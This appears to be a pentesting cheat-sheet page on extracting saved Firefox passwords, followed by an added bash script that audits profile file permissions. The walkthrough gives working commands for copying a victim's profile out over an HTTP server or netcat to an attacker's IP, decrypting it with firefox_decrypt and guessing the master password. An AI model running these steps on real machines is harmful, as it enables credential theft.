Mozilla Pentesting

Last modified: 2023-02-02

Privilege Escalation

Extract Passwords from Firefox Profile

1. Transfer the .firefox Directory

  • Zip

    First, zip the .firefox directory on the target machine, then start a web server to transfer the zip file to the local machine.

    zip -r /tmp/<archive>.zip .firefox
    cd /tmp
    python3 -m http.server 8000

    On the local machine, download the zip file from the remote machine and decompress it.

    wget http://<target-ip>:8000/<archive>.zip

  • Tar

    If zip is not available, tar can be used instead.
    On the local machine, start a listener to receive the archived directory.
    "out.tar" will be created when the remote machine sends the archive.

    nc -lvnp 1234 > out.tar

    On the remote machine, archive the directory and send it over netcat.

    tar -cf - mozilla/ | nc <local-ip> 1234

    Then extract it on the local machine.

    tar -xf out.tar

2. Decrypt the Password

To decrypt the passwords saved in the Firefox profile, use firefox_decrypt.

python3 firefox_decrypt.py .mozilla/firefox/<id>.default-release

If we are asked for the master password and we don’t know it, try common passwords.
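
The procedure above works because saved logins (logins.json) and their key material (key4.db) sit together in each profile directory. As an added example that is not part of the original page, the following audit lists every profile holding saved logins and flags those whose directory or credential files grant any permission to group or other. The function name audit_firefox_profiles is hypothetical, and GNU stat is assumed.

```bash
#!/usr/bin/env bash
# Added example: audit Firefox profile directories for exposed credential stores.
# audit_firefox_profiles is a hypothetical helper name, not part of any tool.
# Assumes GNU coreutils stat (stat -c '%a').

# Print one line per profile that holds saved logins:
#   <status> <profile-dir> <mode of logins.json> <mode of key4.db>
# status is EXPOSED when the profile directory or either file grants any
# permission to group or other, OK otherwise.
audit_firefox_profiles() {
    local root="${1:-$HOME/.mozilla/firefox}" dir f mode status
    [ -d "$root" ] || return 0
    for dir in "$root"/*/; do
        dir="${dir%/}"
        # Saved logins live in logins.json; key4.db holds the key material.
        # Profiles without both files have nothing to report.
        [ -f "$dir/logins.json" ] && [ -f "$dir/key4.db" ] || continue
        status=OK
        for f in "$dir" "$dir/logins.json" "$dir/key4.db"; do
            mode=$(stat -c '%a' "$f")
            # The last two octal digits are the group and other bits;
            # a bare "0" is mode 000.
            case "$mode" in
                0|*00) ;;
                *) status=EXPOSED ;;
            esac
        done
        printf '%s %s %s %s\n' "$status" "$dir" \
            "$(stat -c '%a' "$dir/logins.json")" \
            "$(stat -c '%a' "$dir/key4.db")"
    done
}
```

Run it per user home, for example `audit_firefox_profiles /home/<user>/.mozilla/firefox`. A profile reported as OK is still readable by anyone running as that user, so a primary password remains the control that protects the stored logins at rest.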